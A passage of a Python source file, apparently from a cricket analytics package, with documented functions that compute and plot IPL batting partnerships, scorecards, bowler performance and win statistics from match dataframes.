df4.columns = ['batsman','totalPartnershipRuns']
# Select top 5
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='batsman')
if report == 'summary':
return(df5)
elif report == 'detailed':
return(df6)
else:
print("Invalid option")
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBatsmenPartnershipOppnAllMatchesChart
# This function plots the partnetships for a team in all matches
#
###########################################################################################
def teamBatsmenPartnershipOppnAllMatchesChart(matches,main,opposition,plot=True,top=5,partnershipRuns=20,savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot of team partnership in all IPL matches against an opposition
Description
This function plots the batting partnership of a team againt all oppositions in all
matches This function also returns a dataframe with the batting partnerships
Usage
teamBatsmenPartnershipOppnAllMatchesChart(matches,main,opposition, plot=TRUE,top=5,partnershipRuns=20))
Arguments
matches
All the matches of the team against all oppositions
main
The main team for which the the batting partnerships are sought
opposition
The opposition team for which the the batting partnerships are sought
plot
Whether the partnerships have top be rendered as a plot. If plot=FALSE the data frame is returned
top
The number of players from the top to be included in chart
partnershipRuns
The minimum number of partnership runs to include for the chart
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None or partnerships
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBatsmenPartnershiplOppnAllMatches
saveAllMatchesBetween2IPLTeams
teamBatsmenVsBowlersAllOppnAllMatchesPlot
teamBatsmenVsBowlersOppnAllMatches
'''
df1 = matches[matches.team == main]
df2 = df1[['batsman','non_striker','runs']]
# Compute partnerships
df3=df2.groupby(['batsman','non_striker']).sum().reset_index(inplace=False)
df3.columns = ['batsman','non_striker','partnershipRuns']
# Compute total partnerships
df4 = df3.groupby('batsman').sum().reset_index(inplace=False).sort_values('partnershipRuns',ascending=False)
df4.columns = ['batsman','totalPartnershipRuns']
# Select top 5
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='batsman')
df7 = df6[['batsman','non_striker','partnershipRuns']]
# Remove rows where partnershipRuns < partnershipRuns as there are too many
df8 = df7[df7['partnershipRuns'] > partnershipRuns]
df9=df8.groupby(['batsman','non_striker'])['partnershipRuns'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df8=df7.pivot(columns='non_striker',index='batsman').fillna(0)
if plot == True:
df9.plot(kind='bar',stacked=True,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
plt.title('Partnership runs between ' + main + '-' + opposition)
plt.xlabel('Batsman')
plt.ylabel('Partnership runs')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBatsmenVsBowlersOppnAllMatches
# This function plots the performance of batsmen against bowlers
#
###########################################################################################
def teamBatsmenVsBowlersOppnAllMatches(matches,main,opposition,plot=True,top=5,runsScored=20,savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes the performance of batsmen against the bowlers of an oppositions in all matches
Usage
teamBatsmenVsBowlersOppnAllMatches(matches,main,opposition,plot=TRUE,top=5,runsScored=20)
Arguments
matches
All the matches of the team against one specific opposition
main
The team for which the the batting partnerships are sought
opposition
The opposition team
plot
If plot=True then a plot will be displayed else a data frame will be returned
top
The number of players to be plotted or returned as a dataframe. The default is 5
runsScored
The cutfoff limit for runs scored for runs scored against bowler
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None or dataframe
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBatsmenVsBowlersOppnAllMatchesPlot
teamBatsmenPartnershipOppnAllMatchesChart
teamBatsmenVsBowlersOppnAllMatches
'''
df1 = matches[matches.team == main]
df2 = df1[['batsman','bowler','runs']]
# Runs scored by bowler
df3=df2.groupby(['batsman','bowler']).sum().reset_index(inplace=False)
df3.columns = ['batsman','bowler','runsScored']
# Need to pick the 'top' number of bowlers
df4 = df3.groupby('batsman').sum().reset_index(inplace=False).sort_values('runsScored',ascending=False)
df4.columns = ['batsman','totalRunsScored']
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='batsman')
df7 = df6[['batsman','bowler','runsScored']]
# Remove rows where runsScored < runsScored as there are too many
df8 = df7[df7['runsScored'] >runsScored]
df9=df8.groupby(['batsman','bowler'])['runsScored'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df8=df7.pivot(columns='bowler',index='batsman').fillna(0)
if plot == True:
ax=df9.plot(kind='bar',stacked=False,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
plt.title('Runs against bowlers ' + main + '-' + opposition)
plt.xlabel('Batsman')
plt.ylabel('Runs scored')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBattingScorecardOppnAllMatches
# This function computes the batting scorecard for all matches
#
###########################################################################################
def teamBattingScorecardOppnAllMatches(matches,main,opposition):
'''
Team batting scorecard of a team in all matches against an opposition
Description
This function computes returns the batting scorecard (runs, fours, sixes, balls played)
for the team in all matches against an opposition
Usage
teamBattingScorecardOppnAllMatches(matches,main,opposition)
Arguments
matches
the data frame of all matches between a team and an opposition obtained with the call getAllMatchesBetweenteam()
main
The main team for which scorecard required
opposition
The opposition team
Value
scorecard The scorecard of all the matches
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBatsmenPartnershipAllOppnAllMatches
teamBowlingWicketKindOppositionAllMatches
'''
team=matches.loc[matches.team== main]
a1= getRuns(team)
b1= getFours(team)
c1= getSixes(team)
# Merge columns
d1=pd.merge(a1, b1, how='outer', on='batsman')
e=pd.merge(d1,c1,how='outer', on='batsman')
e=e.fillna(0)
e['4s']=e['4s'].astype(int)
e['6s']=e['6s'].astype(int)
e['SR']=(e['runs']/e['balls']) *100
scorecard = e[['batsman','runs','balls','4s','6s','SR']].sort_values('runs',ascending=False)
return(scorecard)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBattingScorecardOppnAllMatches
# This function computes the batting scorecard for all matches
#
###########################################################################################
def teamBowlingScorecardOppnAllMatches(matches,main,opposition):
'''
Team bowling scorecard opposition all matches
Description
This function computes returns the bowling dataframe of best bowlers
deliveries, maidens, overs, wickets against an IPL oppositions in all matches
Usage
teamBowlingScorecardOppnAllMatches(matches,main,opposition)
Arguments
matches
The matches of the team against all oppositions and all matches
main
Team for which bowling performance is required
opposition
The opposing IPL team
Value
l A data frame with the bowling performance in alll matches against all oppositions
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBowlingWicketKindOppositionAllMatches
teamBatsmenVsBowlersOppnAllMatches
plotWinsbyTossDecision
'''
team=matches.loc[matches.team== main]
# Compute overs bowled
a1= getOvers(team).reset_index(inplace=False)
# Compute runs conceded
b1= getRunsConceded(team).reset_index(inplace=False)
# Compute maidens
c1= getMaidens(team).reset_index(inplace=False)
# Compute wickets
d1= getWickets(team).reset_index(inplace=False)
e1=pd.merge(a1, b1, how='outer', on='bowler')
f1= pd.merge(e1,c1,how='outer', on='bowler')
g1= pd.merge(f1,d1,how='outer', on='bowler')
g1 = g1.fillna(0)
# Compute economy rate
g1['econrate'] = g1['runs']/g1['overs']
g1.columns=['bowler','overs','runs','maidens','wicket','econrate']
g1.maidens = g1.maidens.astype(int)
g1.wicket = g1.wicket.astype(int)
g2 = g1.sort_values('wicket',ascending=False)
return(g2)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBowlingWicketKindOppositionAllMatches
# This function plots the performance of bowlers and the kind of wickets
#
###########################################################################################
def teamBowlingWicketKindOppositionAllMatches(matches,main,opposition,plot=True,top=5,wickets=2,savePic=False, dir1=".",picFile="pic1.png"):
'''
Team bowlers wicket kind against an opposition in all matches
Description
This function computes performance of bowlers of a team and the wicket kind against
an opposition in all matches against the opposition
Usage
teamBowlersWicketKindOppnAllMatches(matches,main,opposition,plot=TRUE,top=5,wickets=2)
Arguments
matches
The data frame of all matches between a team the opposition. T
main
The team for which the performance is required
opposition
The opposing team
plot
If plot=True then a plot is displayed else a dataframe is returned
top
The top number of players to be considered
wickets
The minimum number of wickets as cutoff
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None or dataframe The return depends on the value of the plot
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
plotWinsByRunOrWickets
teamBowlersVsBatsmenOppnAllMatches
'''
df1=matches.loc[matches.team== main]
df2= df1[['bowler','kind','player_out']]
# Find all rows where there was a wicket
df2=df2[df2.player_out != '0']
# Number of wickets taken by bowler
df3=df2.groupby(['bowler','kind']).count().reset_index(inplace=False)
df3.columns = ['bowler','kind','wickets']
# Need to pick the 'top' number of bowlers by wickets
df4 = df3.groupby('bowler').sum().reset_index(inplace=False).sort_values('wickets',ascending=False)
df4.columns = ['bowler','totalWickets']
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='bowler')
df7 = df6[['bowler','kind','wickets']]
# Remove rows where runsScored < runsScored as there are too many
df8 = df7[df7['wickets'] >wickets]
df9=df8.groupby(['bowler','kind'])['wickets'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df9=df8.pivot(columns='bowler',index='batsman').fillna(0)
if plot == True:
ax=df9.plot(kind='bar',stacked=False,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
plt.title('Wicker kind by bowlers of ' + main + '-' + opposition)
plt.xlabel('Bowler')
plt.ylabel('Total wickets')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBowlersVsBatsmenOppnAllMatches
# This function plots the performance of the bowlers against batsmen
#
###########################################################################################
def teamBowlersVsBatsmenOppnAllMatches(matches,main,opposition,plot=True,top=5,runsConceded=10, savePic=False, dir1=".",picFile="pic1.png"):
'''
Team bowlers vs batsmen against an opposition in all matches
Description
This function computes performance of bowlers of a team against an opposition in all
matches against the opposition
Usage
teamBowlersVsBatsmenOppnAllMatches(matches,main,opposition,plot=True,top=5,runsConceded=10))
Arguments
matches
The data frame of all matches between a team the opposition.
main
The main team against which the performance is required
opposition
The opposition team against which the performance is require
plot
If true plot else return dataframe
top
The number of rows to be returned. 5 by default
runsConceded
The minimum numer runs to use as cutoff
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
dataframe The dataframe with all performances
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBatsmenPartnershipOppnAllMatches
teamBowlersVsBatsmenOppnAllMatchesRept
'''
df1=matches.loc[matches.team== main]
df2= df1[['bowler','batsman','runs']]
# Number of wickets taken by bowler
df3=df2.groupby(['bowler','batsman']).sum().reset_index(inplace=False)
df3.columns = ['bowler','batsman','runsConceded']
# Need to pick the 'top' number of bowlers by wickets
df4 = df3.groupby('bowler').sum().reset_index(inplace=False).sort_values('runsConceded',ascending=False)
df4.columns = ['bowler','totalRunsConceded']
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='bowler')
df7 = df6[['bowler','batsman','runsConceded']]
# Remove rows where runsScored < runsScored as there are too many
df8 = df7[df7['runsConceded'] >runsConceded]
df9=df8.groupby(['bowler','batsman'])['runsConceded'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df9=df8.pivot(columns='bowler',index='batsman').fillna(0)
if plot == True:
ax=df9.plot(kind='bar',stacked=False,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
plt.title('Wicker kind by bowlers of ' + main + '-' + opposition)
plt.xlabel('Bowler')
plt.ylabel('Total runs')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: plotWinLossBetweenTeams
# This function plots the number of wins and losses in teams
#
###########################################################################################
def plotWinLossBetweenTeams(matches,team1,team2,plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot wins for each team
Description
This function computes and plots number of wins for each team in all their encounters.
The plot includes the number of wins byteam1 each team and the matches with no result
Usage
plotWinLossBetweenTeams(matches)
Arguments
matches
The dataframe with all matches between 2 IPL teams
team1
The 1st team
team2
The 2nd team
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
teamBattingScorecardOppnAllMatches
teamBatsmenPartnershipOppnAllMatchesChart
getAllMatchesBetweenTeams
'''
a=matches[['date','winner']].groupby(['date','winner']).count().reset_index(inplace=False)
b=a.groupby('winner').count().reset_index(inplace=False)
b.columns = ['winner','number']
sns.barplot(x='winner',y='number',data=b)
plt.xlabel('Winner')
plt.ylabel('Number')
plt.title("Wins vs losses " + team1 + "-"+ team2)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: plotWinsByRunOrWickets
# This function plots how the win for the team was whether by runs or wickets
#
###########################################################################################
def plotWinsByRunOrWickets(matches,team1,plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot whether the wins for the team was by runs or wickets
Description
This function computes and plots number the number of wins by runs vs number of wins
by wickets
Usage
plotWinsByRunOrWickets(matches,team1)
Arguments
matches
The dataframe with all matches between 2 IPL teams
team1
The team for which the plot has to be done
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenPartnershipOppnAllMatchesChart
getAllMatchesBetweenTeams
'''
# Get the number of matches won
df= matches.loc[matches.winner == team1]
a=df[['date','winType']].groupby(['date','winType']).count().reset_index(inplace=False)
b=a.groupby('winType').count().reset_index(inplace=False)
b.columns = ['winType','number']
sns.barplot(x='winType',y='number',data=b)
plt.xlabel('Win Type - Runs or wickets')
plt.ylabel('Number')
plt.title("Win type for team -" + team1 )
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: plotWinsbyTossDecision
# This function plots the number of wins/losses for team based on its toss decision
#
###########################################################################################
def plotWinsbyTossDecision(matches,team1,tossDecision='bat', plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot whether the wins for the team was by runs or wickets
Description
This function computes and plots number the number of wins by runs vs number of wins
by wickets
Usage
plotWinsbyTossDecision(matches,team1,tossDecision='bat')
Arguments
matches
The dataframe with all matches between 2 IPL teams
team1
The team for which the plot has to be done
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenPartnershipOppnAllMatchesChart
teamBowlingWicketKindOppositionAllMatches
'''
df=matches.loc[(matches.tossDecision==tossDecision) & (matches.tossWinner==team1)]
a=df[['date','winner']].groupby(['date','winner']).count().reset_index(inplace=False)
b=a.groupby('winner').count().reset_index(inplace=False)
b.columns = ['winner','number']
sns.barplot(x='winner',y='number',data=b)
plt.xlabel('Winner ' + 'when toss decision was to :' + tossDecision)
plt.ylabel('Number')
plt.title('Wins vs losses for ' + team1 + ' when toss decision was to ' + tossDecision )
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: getAllMatchesAllOpposition
# This function gets all the matches between a IPL team and all opposition
#
###########################################################################################
def getAllMatchesAllOpposition(team1,dir=".",save=False,odir="."):
'''
Get data on all matches against all opposition
Description
This function gets all the matches for a particular IPL team for
against all other oppositions. It constructs a huge dataframe of
all these matches. This can be saved by the user which can be used in
function in which analyses are done for all matches and for all oppositions.
Usage
getAllMatchesAllOpposition(team,dir=".",save=FALSE)
Arguments
team
The team for which all matches and all opposition has to be obtained e.g. India, Pakistan
dir
The directory in which the saved .RData files exist
save
Default=False. This parameter indicates whether the combined data frame needs to be saved or not. It is recommended to save this large dataframe as the creation of this data frame takes a several seconds depending on the number of matches
Value
match The combined data frame
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
saveAllMatchesAllOppositionIPLT20
teamBatsmenPartnershiAllOppnAllMatches
'''
# Create the 2 combinations
t1 = '*' + team1 +'*.csv'
path= os.path.join(dir,t1)
files = glob.glob(path)
print(len(files))
# Save as CSV only if there are matches between the 2 teams
if len(files) !=0:
df = pd.DataFrame()
for file in files:
df1 = pd.read_csv(file)
df=pd.concat([df,df1])
if save==True:
dest= team1 + '-allMatchesAllOpposition.csv'
output=os.path.join(odir,dest)
df.to_csv(output)
else:
return(df)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: saveAllMatchesAllOppositionIPLT20
# This function saves all the matches between all IPL team and all opposition
#
###########################################################################################
def saveAllMatchesAllOppositionIPLT20(dir1,odir="."):
'''
Saves matches against all IPL teams as dataframe and CSV for an IPL team
Description
This function saves all IPL matches agaist all opposition as a single
dataframe in the current directory
Usage
saveAllMatchesAllOppositionIPLT20(dir)
Arguments
dir
Directory to store saved matches
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
convertYaml2PandasDataframeT20
teamBattingScorecardMatch
'''
teams = ["Chennai Super Kings","Deccan Chargers","Delhi Daredevils",
"Kings XI Punjab", 'Kochi Tuskers Kerala',"Kolkata Knight Riders",
"Mumbai Indians", "Pune Warriors","Rajasthan Royals",
"Royal Challengers Bangalore","Sunrisers Hyderabad","Gujarat Lions",
"Rising Pune Supergiants"]
for team in teams:
print("Team=",team)
getAllMatchesAllOpposition(team,dir=dir1,save=True,odir=odir)
time.sleep(2) #Sleep before next save
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBatsmenPartnershiAllOppnAllMatches
# This function computes the partnerships of an IPK team against all other IPL teams
#
###########################################################################################
def teamBatsmenPartnershiAllOppnAllMatches(matches,theTeam,report="summary",top=5):
'''
Team batting partnership against a opposition all IPL matches
Description
This function computes the performance of batsmen against all bowlers of an oppositions in
all matches. This function returns a dataframe
Usage
teamBatsmenPartnershiAllOppnAllMatches(matches,theTeam,report="summary")
Arguments
matches
All the matches of the team against the oppositions
theTeam
The team for which the the batting partnerships are sought
report
If the report="summary" then the list of top batsmen with the highest partnerships
is displayed. If report="detailed" then the detailed break up of partnership is returned
as a dataframe
top
The number of players to be displayed from the top
Value
partnerships The data frame of the partnerships
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBatsmenVsBowlersOppnAllMatchesPlot
teamBatsmenPartnershipOppnAllMatchesChart
'''
df1 = matches[matches.team == theTeam]
df2 = df1[['batsman','non_striker','runs']]
# Compute partnerships
df3=df2.groupby(['batsman','non_striker']).sum().reset_index(inplace=False)
df3.columns = ['batsman','non_striker','partnershipRuns']
# Compute total partnerships
df4 = df3.groupby('batsman').sum().reset_index(inplace=False).sort_values('partnershipRuns',ascending=False)
df4.columns = ['batsman','totalPartnershipRuns']
# Select top 5
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='batsman')
if report == 'summary':
return(df5)
elif report == 'detailed':
return(df6)
else:
print("Invalid option")
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBatsmenPartnershipAllOppnAllMatchesChart
# This function computes and plots the partnerships of an IPK team against all other IPL teams
#
###########################################################################################
def teamBatsmenPartnershipAllOppnAllMatchesChart(matches,main,plot=True,top=5,partnershipRuns=20, savePic=False, dir1=".",picFile="pic1.png"):
'''
Plots team batting partnership all matches all oppositions
Description
This function plots the batting partnership of a team againt all oppositions in all matches This function also returns a dataframe with the batting partnerships
Usage
teamBatsmenPartnershipAllOppnAllMatchesChart(matches,theTeam,main,plot=True,top=5,partnershipRuns=20)
Arguments
matches
All the matches of the team against all oppositions
theTeam
The team for which the the batting partnerships are sought
main
The main team for which the the batting partnerships are sought
plot
Whether the partnerships have top be rendered as a plot. If plot=FALSE the data frame is returned
top
The number of players from the top to be included in chart
partnershipRuns
The minimum number of partnership runs to include for the chart
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None or partnerships
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
'''
df1 = matches[matches.team == main]
df2 = df1[['batsman','non_striker','runs']]
# Compute partnerships
df3=df2.groupby(['batsman','non_striker']).sum().reset_index(inplace=False)
df3.columns = ['batsman','non_striker','partnershipRuns']
# Compute total partnerships
df4 = df3.groupby('batsman').sum().reset_index(inplace=False).sort_values('partnershipRuns',ascending=False)
df4.columns = ['batsman','totalPartnershipRuns']
# Select top 5
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='batsman')
df7 = df6[['batsman','non_striker','partnershipRuns']]
# Remove rows where partnershipRuns < partnershipRuns as there are too many
df8 = df7[df7['partnershipRuns'] > partnershipRuns]
df9=df8.groupby(['batsman','non_striker'])['partnershipRuns'].sum().unstack(fill_value=0)
# Note: Can also use the below code -*************
#df8=df7.pivot(columns='non_striker',index='batsman').fillna(0)
if plot == True:
df9.plot(kind='bar',stacked=True,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
plt.title('Batting partnerships of' + main + 'against all teams')
plt.xlabel('Batsman')
plt.ylabel('Partnership runs')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBatsmenVsBowlersAllOppnAllMatches
# This function computes and plots the performance of batsmen
# of an IPL team against all other teams
#
###########################################################################################
def teamBatsmenVsBowlersAllOppnAllMatches(matches,main,plot=True,top=5,runsScored=20, savePic=False, dir1=".",picFile="pic1.png"):
'''
Report of team batsmen vs bowlers in all matches all oppositions
Description
This function computes the performance of batsmen against all bowlers of all oppositions in all matches
Usage
teamBatsmenVsBowlersAllOppnAllMatches(matches,main,plot=True,top=5,runsScored=20)
Arguments
matches
All the matches of the team against all oppositions
main
The team for which the the batting partnerships are sought
plot
Whether a plot is required or not
top
The number of top batsmen to be included
runsScored
The total runs scoed by batsmen
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
The data frame of the batsman and the runs against bowlers
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
'''
df1 = matches[matches.team == main]
df2 = df1[['batsman','bowler','runs']]
# Runs scored by bowler
df3=df2.groupby(['batsman','bowler']).sum().reset_index(inplace=False)
df3.columns = ['batsman','bowler','runsScored']
print(df3.shape)
# Need to pick the 'top' number of bowlers
df4 = df3.groupby('batsman').sum().reset_index(inplace=False).sort_values('runsScored',ascending=False)
print(df4.shape)
df4.columns = ['batsman','totalRunsScored']
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='batsman')
df7 = df6[['batsman','bowler','runsScored']]
# Remove rows where runsScored < runsScored as there are too many
df8 = df7[df7['runsScored'] >runsScored]
df9=df8.groupby(['batsman','bowler'])['runsScored'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df8=df7.pivot(columns='bowler',index='batsman').fillna(0)
if plot == True:
ax=df9.plot(kind='bar',stacked=False,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
#ax.legend(fontsize=25)
plt.title('Runs by ' + main + ' against all T20 bowlers')
plt.xlabel('Batsman')
plt.ylabel('Runs scored')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBattingScorecardAllOppnAllMatches
# This function computes and batting scorecard of an IPL team against all other
# IPL teams
#
###########################################################################################
def teamBattingScorecardAllOppnAllMatches(matches,main):
'''
Team batting scorecard against all oppositions in all matches
Description
This function omputes and returns the batting scorecard of a team in all matches against all oppositions. The data frame has the ball played, 4's,6's and runs scored by batsman
Usage
teamBattingScorecardAllOppnAllMatches(matches,theTeam)
Arguments
matches
All matches of the team in all matches with all oppositions
main
The team for which the the batting partnerships are sought
Value
details The data frame of the scorecard of the team in all matches against all oppositions
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
'''
team=matches.loc[matches.team== main]
a1= getRuns(team)
b1= getFours(team)
c1= getSixes(team)
# Merge columns
d1=pd.merge(a1, b1, how='outer', on='batsman')
e=pd.merge(d1,c1,how='outer', on='batsman')
e=e.fillna(0)
e['4s']=e['4s'].astype(int)
e['6s']=e['6s'].astype(int)
e['SR']=(e['runs']/e['balls']) *100
scorecard = e[['batsman','runs','balls','4s','6s','SR']].sort_values('runs',ascending=False)
return(scorecard)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBowlingScorecardAllOppnAllMatches
# This function computes and bowling scorecard of an IPL team against all other
# IPL teams
#
###########################################################################################
def teamBowlingScorecardAllOppnAllMatches(matches,main):
'''
Team bowling scorecard all opposition all matches
Description
This function computes returns the bowling dataframe of bowlers deliveries,
maidens, overs, wickets against all oppositions in all matches
Usage
teamBowlingScorecardAllOppnAllMatches(matches,theTeam)
Arguments
matches
The matches of the team against all oppositions and all matches
theTeam
Team for which bowling performance is required
Value
l A data frame with the bowling performance in alll matches against all oppositions
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
'''
team=matches.loc[matches.team== main]
# Compute overs bowled
a1= getOvers(team).reset_index(inplace=False)
# Compute runs conceded
b1= getRunsConceded(team).reset_index(inplace=False)
# Compute maidens
c1= getMaidens(team).reset_index(inplace=False)
# Compute wickets
d1= getWickets(team).reset_index(inplace=False)
e1=pd.merge(a1, b1, how='outer', on='bowler')
f1= pd.merge(e1,c1,how='outer', on='bowler')
g1= pd.merge(f1,d1,how='outer', on='bowler')
g1 = g1.fillna(0)
# Compute economy rate
g1['econrate'] = g1['runs']/g1['overs']
g1.columns=['bowler','overs','runs','maidens','wicket','econrate']
g1.maidens = g1.maidens.astype(int)
g1.wicket = g1.wicket.astype(int)
g2 = g1.sort_values('wicket',ascending=False)
return(g2)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBowlingWicketKindAllOppnAllMatches
# This function computes and plots the wicket kind of an IPL team against all other
# IPL teams
#
###########################################################################################
def teamBowlingWicketKindAllOppnAllMatches(matches,main,plot=True,top=5,wickets=2,savePic=False, dir1=".",picFile="pic1.png"):
df1=matches.loc[matches.team== main]
df2= df1[['bowler','kind','player_out']]
# Find all rows where there was a wicket
df2=df2[df2.player_out != '0']
# Number of wickets taken by bowler
df3=df2.groupby(['bowler','kind']).count().reset_index(inplace=False)
df3.columns = ['bowler','kind','wickets']
# Need to pick the 'top' number of bowlers by wickets
df4 = df3.groupby('bowler').sum().reset_index(inplace=False).sort_values('wickets',ascending=False)
df4.columns = ['bowler','totalWickets']
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='bowler')
